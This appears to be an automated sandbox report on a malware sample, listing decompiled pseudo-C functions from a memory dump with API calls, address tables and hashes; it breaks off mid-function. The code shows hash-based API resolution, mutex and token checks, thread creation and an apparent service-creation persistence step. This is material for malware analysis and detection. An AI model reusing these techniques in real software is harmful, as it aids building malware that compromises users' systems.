                                                                			E000D1490(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
                                                                				signed int _v20;
                                                                				char _v540;
                                                                				void* _t16;
                                                                				long _t23;
                                                                				intOrPtr* _t25;
                                                                				void* _t26;
                                                                				signed int _t27;
                                                                				signed int _t28;
                                                                				signed int _t30;
                                                                				void* _t31;
                                                                				void* _t33;
                                                                
                                                                				_t27 = _a20 & 0x000000ff;
                                                                				_t28 = 0;
                                                                				_v20 = _a24 & 0x000000ff;
                                                                				do {
                                                                					_t14 =  &_v540;
                                                                					E000D5CD0(_t35, _a4,  &_v540, _t27, _v20);
                                                                					_t16 = E000E8960(_a12, _a8, _t14);
                                                                					_t33 = _t31 + 0x1c;
                                                                					if(_t16 == 0) {
                                                                						goto L2;
                                                                					}
                                                                					_t37 = _a16;
                                                                					if(_a16 == 0) {
                                                                						L1:
                                                                						E000DBF50(__eflags, 0, 0xbf8ba27);
                                                                						_t33 = _t33 + 8;
                                                                						_t23 = GetFileAttributesW(_a12); // executed
                                                                						__eflags = _t23 - 0xffffffff;
                                                                						if(__eflags == 0) {
                                                                							return 1;
                                                                						}
                                                                						goto L2;
                                                                					}
                                                                					_t25 = E000DBF50(_t37, 3, 0xd85c117);
                                                                					_t33 = _t33 + 8;
                                                                					_t26 =  *_t25(_a12, _a16);
                                                                					_t38 = _t26;
                                                                					if(_t26 != 0) {
                                                                						goto L1;
                                                                					}
                                                                					L2:
                                                                					_t30 = E000D22E0(_t38, 0,  !_t28);
                                                                					E000D1460(_t38, _t28, 1);
                                                                					_t31 = _t33 + 0x10;
                                                                					_t35 = _t30 - 0x64;
                                                                					_t28 = _t30;
                                                                				} while (_t30 != 0x64);
                                                                				return 0;
                                                                			}














                                                                0x000d14a0
                                                                0x000d14a4
                                                                0x000d14a6
                                                                0x000d14ec
                                                                0x000d14f0
                                                                0x000d14fc
                                                                0x000d150b
                                                                0x000d1510
                                                                0x000d1515
                                                                0x00000000
                                                                0x00000000
                                                                0x000d1517
                                                                0x000d151b
                                                                0x000d14b0
                                                                0x000d14b7
                                                                0x000d14bc
                                                                0x000d14c2
                                                                0x000d14c4
                                                                0x000d14c7
                                                                0x00000000
                                                                0x000d1542
                                                                0x00000000
                                                                0x000d14c7
                                                                0x000d1524
                                                                0x000d1529
                                                                0x000d1532
                                                                0x000d1534
                                                                0x000d1536
                                                                0x00000000
                                                                0x00000000
                                                                0x000d14c9
                                                                0x000d14d8
                                                                0x000d14dd
                                                                0x000d14e2
                                                                0x000d14e5
                                                                0x000d14e8
                                                                0x000d14e8
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
                                                                • Instruction ID: 9c993c277cb76a85e52fb5033ff05b1446fa905e90729c66426f93c5330b5bb0
                                                                • Opcode Fuzzy Hash: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
                                                                • Instruction Fuzzy Hash: F1110D71940319BBDF112E64AC02BFE3AA99F50355F040123FC29A5397F936CE3096B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 75%
                                                                			E000DAD80(void* __eflags, intOrPtr _a4, void* _a8) {
                                                                				void* _v16;
                                                                				long _v20;
                                                                				void* _t10;
                                                                				intOrPtr* _t12;
                                                                				void* _t13;
                                                                				void* _t15;
                                                                				intOrPtr* _t16;
                                                                				int _t19;
                                                                				void* _t24;
                                                                				void* _t26;
                                                                				void* _t27;
                                                                				void* _t30;
                                                                				void* _t31;
                                                                				void* _t33;
                                                                
                                                                				_t33 = __eflags;
                                                                				_v20 = 0;
                                                                				_v16 = 0;
                                                                				_t10 = E000D9D50(0x647400a5);
                                                                				_t12 = E000DBF50(_t33, _t10, E000D9D50(0x6b5f7e12));
                                                                				_t30 = _t27 + 0x10;
                                                                				_t13 =  *_t12(_a4, 8,  &_v16);
                                                                				_t34 = _t13;
                                                                				if(_t13 == 0) {
                                                                					_t26 = 0;
                                                                					__eflags = 0;
                                                                					L7:
                                                                					return _t26;
                                                                				}
                                                                				_t24 = _a8;
                                                                				_t15 = E000EB530(_t13, _t34, _v16); // executed
                                                                				_t31 = _t30 + 4;
                                                                				_t26 = _t15;
                                                                				if(_t24 != 0) {
                                                                					_t36 = _t26;
                                                                					if(_t26 != 0) {
                                                                						E000DBF50(_t36, 9, 0xbd557e);
                                                                						_t31 = _t31 + 8;
                                                                						_t19 = GetTokenInformation(_v16, 0xc, _t24, 4,  &_v20); // executed
                                                                						if(_t19 == 0) {
                                                                							E000DB570(_t26);
                                                                							_t31 = _t31 + 4;
                                                                							_t26 = 0;
                                                                						}
                                                                					}
                                                                				}
                                                                				_t16 = E000DBF50(0, 0, 0xb8e7db5);
                                                                				 *_t16(_v16);
                                                                				goto L7;
                                                                			}

















                                                                0x000dad80
                                                                0x000dad8b
                                                                0x000dad92
                                                                0x000dad9e
                                                                0x000dadb7
                                                                0x000dadbc
                                                                0x000dadc6
                                                                0x000dadc8
                                                                0x000dadca
                                                                0x000dae26
                                                                0x000dae26
                                                                0x000dae28
                                                                0x000dae30
                                                                0x000dae30
                                                                0x000dadcc
                                                                0x000dadd2
                                                                0x000dadd7
                                                                0x000dadda
                                                                0x000dadde
                                                                0x000dade0
                                                                0x000dade2
                                                                0x000dadeb
                                                                0x000dadf0
                                                                0x000dadff
                                                                0x000dae03
                                                                0x000dae06
                                                                0x000dae0b
                                                                0x000dae0e
                                                                0x000dae0e
                                                                0x000dae03
                                                                0x000dade2
                                                                0x000dae17
                                                                0x000dae22
                                                                0x00000000

                                                                APIs
                                                                  • Part of subcall function 000EB530: GetTokenInformation.KERNELBASE(000DADD7,00000001,00000000,00000000,?,000DADD7,00000000), ref: 000EB55A
                                                                  • Part of subcall function 000EB530: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000EB5B5
                                                                • GetTokenInformation.KERNELBASE(00000000,0000000C,00000000,00000004,?), ref: 000DADFF
                                                                  • Part of subcall function 000DB570: HeapFree.KERNEL32(00000000,000E54D2,000E54D2,?), ref: 000DB593
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: InformationToken$FreeHeap
                                                                • String ID:
                                                                • API String ID: 3931431456-0
                                                                • Opcode ID: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
                                                                • Instruction ID: bfe70ba34bc11faf0b81ed91480fa1b0a51747ba504b44df58c34016cebfe4e6
                                                                • Opcode Fuzzy Hash: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
                                                                • Instruction Fuzzy Hash: 59110672E0031477EB2167A0AC02BAF77699F51704F050135FD1866346FB71AA24C6F2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 75%
                                                                			E000E58D0(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
                                                                				char _v17;
                                                                				intOrPtr _v24;
                                                                				intOrPtr _v28;
                                                                				char _v66;
                                                                				char _v124;
                                                                				char _v238;
                                                                				char _v1278;
                                                                				char _v1794;
                                                                				void* __esi;
                                                                				signed char _t35;
                                                                				signed char _t37;
                                                                				void* _t38;
                                                                				intOrPtr* _t40;
                                                                				signed char _t44;
                                                                				intOrPtr* _t45;
                                                                				signed char _t47;
                                                                				intOrPtr _t50;
                                                                				void* _t51;
                                                                				void* _t52;
                                                                				signed int _t53;
                                                                				void* _t54;
                                                                				intOrPtr* _t56;
                                                                				intOrPtr* _t57;
                                                                				intOrPtr _t63;
                                                                				void* _t64;
                                                                				void* _t67;
                                                                				void* _t68;
                                                                				void* _t69;
                                                                				intOrPtr _t70;
                                                                				intOrPtr _t88;
                                                                				void* _t89;
                                                                				void* _t90;
                                                                				void* _t93;
                                                                				void* _t95;
                                                                				void* _t98;
                                                                				void* _t103;
                                                                				void* _t105;
                                                                				void* _t107;
                                                                				void* _t108;
                                                                				void* _t112;
                                                                				void* _t113;
                                                                				void* _t116;
                                                                
                                                                				_t116 = __eflags;
                                                                				_push(__eax);
                                                                				_t86 = __edx;
                                                                				_t69 = __ecx;
                                                                				_v17 = _a4;
                                                                				_t89 = L000DC1E0(0x1c);
                                                                				E000EED20(_t30);
                                                                				L000EFA50(_t89, _t69);
                                                                				_t3 = _t89 + 0xc; // 0xc
                                                                				_t77 = _t3;
                                                                				L000EFA50(_t3, __edx);
                                                                				 *((char*)(_t89 + 0x18)) = _v17;
                                                                				_t35 = E000E9AC0(_t116, 0xffffffff); // executed
                                                                				_t37 = E000D4350(_t35 & 0x000000ff, 4);
                                                                				_t98 = _t95 + 0x10;
                                                                				_t117 = _t37 & 0x00000001;
                                                                				if((_t37 & 0x00000001) != 0) {
                                                                					_t77 = _t89;
                                                                					_t98 = _t98 + 4;
                                                                					_pop(_t89);
                                                                					_pop(_t86);
                                                                					_pop(_t69);
                                                                					_pop(_t93);
                                                                					_t90 = _t77;
                                                                					_t38 = E000EFCF0(_t77 + 0xc);
                                                                					_t87 =  &_v1794;
                                                                					E000E7700(_t87, _t38, 0xffffffff);
                                                                					_t40 = E000DBF50(_t117, 3, 0x5ea9ec7);
                                                                					 *_t40(_t87, _t89, _t86, _t69, _t93);
                                                                					_t44 = E000D4350(E000E9AC0(_t117, 0xffffffff) & 0x000000ff, 4);
                                                                					_t103 = _t98 - 0x6f4 + 0x20;
                                                                					if((_t44 & 0x00000001) != 0) {
                                                                						_t45 = E000DBF50(__eflags, 9, 0x28243c7);
                                                                						_t70 =  *_t45(0, 0, 2);
                                                                						_t47 = E000DA500(__eflags, _t46, 0);
                                                                						_t105 = _t103 + 0x10;
                                                                						__eflags = _t47 & 0x00000001;
                                                                						if((_t47 & 0x00000001) == 0) {
                                                                							__eflags =  *((char*)(_t90 + 0x18));
                                                                							_v24 = _t70;
                                                                							if( *((char*)(_t90 + 0x18)) == 0) {
                                                                								E000E7700( &_v1278, _t87, 0xffffffff);
                                                                								_t107 = _t105 + 0xc;
                                                                							} else {
                                                                								E000ED650(E000D7200(0xf0840,  &_v66),  &_v1278, 0x208, _t60, _t87);
                                                                								_t107 = _t105 + 0x18;
                                                                							}
                                                                							_t50 = E000DBF50(__eflags, 9, 0x42453f7);
                                                                							_t108 = _t107 + 8;
                                                                							_v28 = _t50;
                                                                							_t51 = E000EFCF0(_t90);
                                                                							_t52 = E000EFCF0(_t90);
                                                                							_t88 = _v24;
                                                                							_t53 = _v28(_t88, _t52, _t51, 0xf01ff, 0x110, 2, 0,  &_v1278, 0, 0, 0, 0, 0);
                                                                							__eflags = _t53;
                                                                							if(__eflags != 0) {
                                                                								_t57 = E000DBF50(__eflags, 9, 0x48eed75);
                                                                								_t108 = _t108 + 8;
                                                                								 *_t57(_t53);
                                                                							}
                                                                							_t54 = E000D9D50(0x647400a5);
                                                                							_t56 = E000DBF50(__eflags, _t54, E000D9D50(0x60faedd9));
                                                                							_t105 = _t108 + 0x10;
                                                                							_t47 =  *_t56(_t88);
                                                                						}
                                                                					} else {
                                                                						_t63 = E000D7200(0xf0c50,  &_v238);
                                                                						_t112 = _t103 + 8;
                                                                						_t119 =  *((char*)(_t90 + 0x18));
                                                                						_v24 = _t63;
                                                                						if( *((char*)(_t90 + 0x18)) == 0) {
                                                                							_t64 = E000DBA30(__eflags, _t87);
                                                                							_t113 = _t112 + 4;
                                                                						} else {
                                                                							_t67 = E000D7200(0xf0840,  &_v124);
                                                                							_t68 = E000D9D50(0x647402a4);
                                                                							_t84 =  &_v1278;
                                                                							_t87 =  &_v1278;
                                                                							_t64 = E000ED650(_t68, _t84, _t68, _t67,  &_v1278);
                                                                							_t113 = _t112 + 0x1c;
                                                                						}
                                                                						_t47 = E000E2450(_t119, 0x80000001, _v24, E000EFCF0(_t90), _t87, _t64);
                                                                						_t105 = _t113 + 0x14;
                                                                					}
                                                                					return _t47;
                                                                				} else {
                                                                					__eax = E000DBF50(__eflags, 0, 0xa0733d4);
                                                                					__eax = CreateThread(0, 0, E000DBE30, __esi, 0, 0); // executed
                                                                					__esp = __esp + 4;
                                                                					return __eax;
                                                                				}
                                                                			}













































                                                                0x000e58d0
                                                                0x000e58d6
                                                                0x000e58da
                                                                0x000e58dc
                                                                0x000e58de
                                                                0x000e58ed
                                                                0x000e58ef
                                                                0x000e58f7
                                                                0x000e58fc
                                                                0x000e58fc
                                                                0x000e5900
                                                                0x000e5908
                                                                0x000e590d
                                                                0x000e591b
                                                                0x000e5920
                                                                0x000e5923
                                                                0x000e5925
                                                                0x000e594e
                                                                0x000e5950
                                                                0x000e5953
                                                                0x000e5954
                                                                0x000e5955
                                                                0x000e5956
                                                                0x000e223c
                                                                0x000e2241
                                                                0x000e2246
                                                                0x000e2250
                                                                0x000e225f
                                                                0x000e2268
                                                                0x000e227a
                                                                0x000e227f
                                                                0x000e2284
                                                                0x000e22e4
                                                                0x000e22f4
                                                                0x000e22f9
                                                                0x000e22fe
                                                                0x000e2301
                                                                0x000e2303
                                                                0x000e2309
                                                                0x000e230d
                                                                0x000e2310
                                                                0x000e236f
                                                                0x000e2374
                                                                0x000e2312
                                                                0x000e2331
                                                                0x000e2336
                                                                0x000e2336
                                                                0x000e237e
                                                                0x000e2383
                                                                0x000e2388
                                                                0x000e238b
                                                                0x000e2394
                                                                0x000e23ba
                                                                0x000e23be
                                                                0x000e23c1
                                                                0x000e23c3
                                                                0x000e23ce
                                                                0x000e23d3
                                                                0x000e23d7
                                                                0x000e23d7
                                                                0x000e23de
                                                                0x000e23f7
                                                                0x000e23fc
                                                                0x000e2400
                                                                0x000e2400
                                                                0x000e2286
                                                                0x000e2292
                                                                0x000e2297
                                                                0x000e229a
                                                                0x000e229e
                                                                0x000e22a1
                                                                0x000e233c
                                                                0x000e2341
                                                                0x000e22a7
                                                                0x000e22b0
                                                                0x000e22bf
                                                                0x000e22c7
                                                                0x000e22d1
                                                                0x000e22d3
                                                                0x000e22d8
                                                                0x000e22d8
                                                                0x000e2358
                                                                0x000e235d
                                                                0x000e235d
                                                                0x000e240c
                                                                0x000e5927
                                                                0x000e592e
                                                                0x000e5944
                                                                0x000e5946
                                                                0x000e594d
                                                                0x000e594d

                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000BE30,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 000E5944
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: 0111cc39bd56185ea40b0aee6db3e3beac92bf6fbfc8b2169cda9f3754f4927f
                                                                • Instruction ID: fd5edb3017c0c55ca8e7c087e2c10e312bf67093828373a6bab180a0a04da777
                                                                • Opcode Fuzzy Hash: 0111cc39bd56185ea40b0aee6db3e3beac92bf6fbfc8b2169cda9f3754f4927f
                                                                • Instruction Fuzzy Hash: 3B01FCA5B843983AE92061AA3C03FFF7B5C4B91775F080075FA5DAA3C3D851661491F3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 68%
                                                                			E000EB710(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, WCHAR* _a8, intOrPtr _a12) {
                                                                				void* _t5;
                                                                				intOrPtr* _t8;
                                                                				void* _t10;
                                                                				intOrPtr* _t11;
                                                                				void* _t15;
                                                                				void* _t17;
                                                                
                                                                				E000DBF50(__eflags, 0, 0xee41457);
                                                                				_t5 = CreateMutexW(_a4, 0, _a8); // executed
                                                                				_t17 = 0;
                                                                				_t25 = _t5;
                                                                				if(_t5 != 0) {
                                                                					_t15 = _t5;
                                                                					_t8 = E000DBF50(_t25, 0, E000D9D50(0x640dea48));
                                                                					_t10 = E000D3750(_t25,  *_t8(_t15, _a12), 0xffffff7f);
                                                                					_t26 = _t10;
                                                                					if(_t10 == 0) {
                                                                						_t17 = _t15;
                                                                					} else {
                                                                						_t11 = E000DBF50(_t26, 0, 0xb8e7db5);
                                                                						 *_t11(_t15);
                                                                					}
                                                                				}
                                                                				return _t17;
                                                                			}









                                                                0x000eb723
                                                                0x000eb72f
                                                                0x000eb731
                                                                0x000eb733
                                                                0x000eb735
                                                                0x000eb73a
                                                                0x000eb74c
                                                                0x000eb75e
                                                                0x000eb766
                                                                0x000eb768
                                                                0x000eb77e
                                                                0x000eb76a
                                                                0x000eb771
                                                                0x000eb77a
                                                                0x000eb77a
                                                                0x000eb768
                                                                0x000eb786

                                                                APIs
                                                                • CreateMutexW.KERNEL32(?,00000000,000F2850,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000EB72F
                                                                  • Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: CreateLibraryLoadMutex
                                                                • String ID:
                                                                • API String ID: 427046056-0
                                                                • Opcode ID: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
                                                                • Instruction ID: 289dafd7e4d99ad27e28c80940f6d9b9e582ee69d927a0f14c355ea8da985234
                                                                • Opcode Fuzzy Hash: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
                                                                • Instruction Fuzzy Hash: 61F062ABA453297BE61026B56C43FAB724C8BD1A67F060025FE1CA7386EA51AD0041F2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000D8290(intOrPtr _a4) {
                                                                				void* _t4;
                                                                				long _t6;
                                                                				void* _t8;
                                                                				intOrPtr _t9;
                                                                
                                                                				_t9 = _a4;
                                                                				_t19 = _t9;
                                                                				if(_t9 == 0) {
                                                                					__eflags = 0;
                                                                					return 0;
                                                                				}
                                                                				_t4 = E000D1460(_t19, _t9, E000D9D50(0x1bde8cd4));
                                                                				_t6 = E000D22E0(_t19, _t4 + 4, E000D9D50(0x1bde8cd4));
                                                                				E000DBF50(_t19, 0, 0x8685de3);
                                                                				_t8 = RtlAllocateHeap( *0xf2124, 8, _t6); // executed
                                                                				return _t8;
                                                                			}







                                                                0x000d8294
                                                                0x000d8297
                                                                0x000d8299
                                                                0x000d82ec
                                                                0x00000000
                                                                0x000d82ec
                                                                0x000d82aa
                                                                0x000d82c6
                                                                0x000d82d7
                                                                0x000d82e8
                                                                0x00000000

                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000D82E8
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: c2dfccd7380c664e5a890f5ef95fa4677a8fc6dd2e538460ef496d8c4d0ad036
                                                                • Instruction ID: 12d73507369016189746c0016f8c7c45102c3eea82347becb9a20daa1e9037b3
                                                                • Opcode Fuzzy Hash: c2dfccd7380c664e5a890f5ef95fa4677a8fc6dd2e538460ef496d8c4d0ad036
                                                                • Instruction Fuzzy Hash: 47E03066D516247BE55132A0BC03AFB35888B1277AF0B0032FD0DB6343E9426A1443FB
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 68%
                                                                			E000EC210(void* __eflags) {
                                                                				char _v408;
                                                                				intOrPtr* _t2;
                                                                				signed short _t3;
                                                                				void* _t5;
                                                                
                                                                				_t2 = E000DBF50(__eflags, 6, 0xaaf7240); // executed
                                                                				_t3 = E000D9BA0(_t2, 0x2ae);
                                                                				_t5 =  *_t2(_t3 & 0x0000ffff,  &_v408); // executed
                                                                				return E000D55C0(_t5, 0) & 0x00000001;
                                                                			}







                                                                0x000ec221
                                                                0x000ec230
                                                                0x000ec243
                                                                0x000ec25a

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID:
                                                                • API String ID: 724789610-0
                                                                • Opcode ID: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
                                                                • Instruction ID: 4b5e65aae6b2d1efe121db45faa00fd8f7a28187914ab2d097b4054b3ac83616
                                                                • Opcode Fuzzy Hash: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
                                                                • Instruction Fuzzy Hash: 5AE086B2D4031437E52072B17C17FF636488711725F450062FE4C552C3F456662880F6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000E0390(void* __eax) {
                                                                				void _v12;
                                                                				void* _t4;
                                                                				int _t7;
                                                                				void* _t15;
                                                                
                                                                				_v12 = 0xa;
                                                                				_t4 = E000D9D50(0x647400bf);
                                                                				E000DBF50(_t15, _t4, E000D9D50(0x61c0d6ad));
                                                                				_t7 = InternetSetOptionA(0, 0x49,  &_v12, 4); // executed
                                                                				return _t7;
                                                                			}







                                                                0x000e0395
                                                                0x000e03a1
                                                                0x000e03ba
                                                                0x000e03cc
                                                                0x000e03d3

                                                                APIs
                                                                • InternetSetOptionA.WININET(00000000,00000049,?,00000004,?,?,?,000DC94D), ref: 000E03CC
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: InternetOption
                                                                • String ID:
                                                                • API String ID: 3327645240-0
                                                                • Opcode ID: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
                                                                • Instruction ID: f4fc558fe1b28674f11d981f8b773c1249634b056fd757ecbb5d32feab1d5685
                                                                • Opcode Fuzzy Hash: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
                                                                • Instruction Fuzzy Hash: 4BE08CE6D803143AE65062D0AC03FFB355C8B12229F060071FA0DA5383F5A666148AF3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 79%
                                                                			E000E8F40(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
                                                                				char _t8;
                                                                				signed int _t11;
                                                                				signed int _t13;
                                                                				char _t14;
                                                                				void* _t15;
                                                                
                                                                				if(_a8 == 0) {
                                                                					L7:
                                                                					return _t8;
                                                                				}
                                                                				_t13 = _a16 & 0x000000ff;
                                                                				_t11 = _a12 & 0x000000ff;
                                                                				_t14 = 0;
                                                                				_t18 = 0;
                                                                				if(0 != 0) {
                                                                					L5:
                                                                					_t18 = _a20;
                                                                					if(_a20 != 0) {
                                                                						E000DBF50(_t18, 0, 0x7a2bc0);
                                                                						_t15 = _t15 + 8;
                                                                						Sleep(0x14); // executed
                                                                					}
                                                                					while(1) {
                                                                						L3:
                                                                						 *((char*)(_a4 + _t14)) = E000DD620(_t11, _t13);
                                                                						_t8 = E000D1460(_t18, _t14, 1);
                                                                						_t15 = _t15 + 0x10;
                                                                						_t14 = _t8;
                                                                						if(_t8 == _a8) {
                                                                							goto L7;
                                                                						}
                                                                						if(_t14 == 0) {
                                                                							continue;
                                                                						}
                                                                						goto L5;
                                                                					}
                                                                					goto L7;
                                                                				}
                                                                				goto L3;
                                                                			}








                                                                0x000e8f4a
                                                                0x000e8fa5
                                                                0x000e8fa5
                                                                0x000e8fa5
                                                                0x000e8f4c
                                                                0x000e8f50
                                                                0x000e8f54
                                                                0x000e8f56
                                                                0x000e8f58
                                                                0x000e8f86
                                                                0x000e8f86
                                                                0x000e8f8a
                                                                0x000e8f93
                                                                0x000e8f98
                                                                0x000e8f9d
                                                                0x000e8f9d
                                                                0x000e8f60
                                                                0x000e8f60
                                                                0x000e8f6d
                                                                0x000e8f73
                                                                0x000e8f78
                                                                0x000e8f7e
                                                                0x000e8f80
                                                                0x00000000
                                                                0x00000000
                                                                0x000e8f84
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000e8f84
                                                                0x00000000
                                                                0x000e8f60
                                                                0x00000000

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
                                                                • Instruction ID: 84dd65260700af12c1c3e47a24e984592855d9e194a6ff5662f329dc8a77b220
                                                                • Opcode Fuzzy Hash: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
                                                                • Instruction Fuzzy Hash: 4FF02B719453ED7ECB311A22AC45FEE3B858B82B69F194172FC4D39383D921895083F1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000DB570(void* _a4) {
                                                                				void* _t2;
                                                                				int _t4;
                                                                				void* _t5;
                                                                
                                                                				_t5 = _a4;
                                                                				_t8 = _t5;
                                                                				if(_t5 != 0) {
                                                                					E000DBF50(_t8, 0, 0xb86de55);
                                                                					_t4 = HeapFree( *0xf2124, 0, _t5); // executed
                                                                					return _t4;
                                                                				}
                                                                				return _t2;
                                                                			}






                                                                0x000db574
                                                                0x000db577
                                                                0x000db579
                                                                0x000db582
                                                                0x000db593
                                                                0x00000000
                                                                0x000db593
                                                                0x000db597

                                                                APIs
                                                                • HeapFree.KERNEL32(00000000,000E54D2,000E54D2,?), ref: 000DB593
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 2fff299a361e8af46d9b9b5394ad03620459419cd5712241ecd2fa6167a2789a
                                                                • Instruction ID: 8ea6aae5816049e169f7bffd0401ed29982ad1c5eccc562260893a283648c4f6
                                                                • Opcode Fuzzy Hash: 2fff299a361e8af46d9b9b5394ad03620459419cd5712241ecd2fa6167a2789a
                                                                • Instruction Fuzzy Hash: 49D02332641324B3D5111780BC03F96374CCB10F91F050021FE0C773555141391045F0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                C-Code - Quality: 97%
                                                                			E000DD830(signed int _a4, intOrPtr _a8) {
                                                                				signed short* _v20;
                                                                				CHAR* _v24;
                                                                				char _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _v36;
                                                                				signed int _v40;
                                                                				char _v140;
                                                                				void* _t78;
                                                                				void* _t79;
                                                                				void* _t83;
                                                                				void* _t93;
                                                                				signed short* _t100;
                                                                				signed short* _t102;
                                                                				void* _t105;
                                                                				void* _t112;
                                                                				char _t113;
                                                                				signed short* _t114;
                                                                				void* _t115;
                                                                				void* _t120;
                                                                				signed int _t122;
                                                                				signed int _t124;
                                                                				signed int _t133;
                                                                				void* _t135;
                                                                				intOrPtr _t136;
                                                                				signed int _t137;
                                                                				signed int _t139;
                                                                				_Unknown_base(*)()* _t141;
                                                                				char* _t143;
                                                                				signed int _t144;
                                                                				void* _t149;
                                                                				signed short* _t153;
                                                                				signed int _t155;
                                                                				intOrPtr _t159;
                                                                				void* _t160;
                                                                				signed char* _t161;
                                                                				void* _t165;
                                                                				intOrPtr _t166;
                                                                				_Unknown_base(*)()* _t170;
                                                                				signed short* _t173;
                                                                				CHAR* _t174;
                                                                				signed int _t175;
                                                                				void* _t176;
                                                                				void* _t177;
                                                                				void* _t178;
                                                                				void* _t180;
                                                                				void* _t183;
                                                                				void* _t187;
                                                                				void* _t191;
                                                                				void* _t192;
                                                                				void* _t199;
                                                                
                                                                				_t133 = _a4;
                                                                				_t141 = 0;
                                                                				_t204 = _t133;
                                                                				if(_t133 != 0) {
                                                                					_t78 = E000E12D0(_t204, _t133);
                                                                					_t149 = _t78;
                                                                					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
                                                                					_t79 = E000D9D50(0x975b6640);
                                                                					_t141 = 0;
                                                                					_t180 = _t178 + 8;
                                                                					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
                                                                					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
                                                                						_t6 = _t165 + 0xcd09914; // 0xcd09914
                                                                						_t166 = _t79 + _t6;
                                                                						_v36 =  *((intOrPtr*)(_t149 + 0x64));
                                                                						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E000D9D50(0x60421690) + 0x436163c;
                                                                						_v32 = _t166;
                                                                						_t83 = E000D1460(_t205, E000D1460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
                                                                						_t183 = _t180 + 0x14;
                                                                						_v40 =  ~_t133;
                                                                						_t143 = _t83 + 0xa1511d8c;
                                                                						_t135 = 0;
                                                                						0;
                                                                						do {
                                                                							_v20 = _t153;
                                                                							_v24 = _t143;
                                                                							_t155 =  ~(E000D1460(0,  ~( *_t143), _v40));
                                                                							E000D1460(0,  *_t143, _a4);
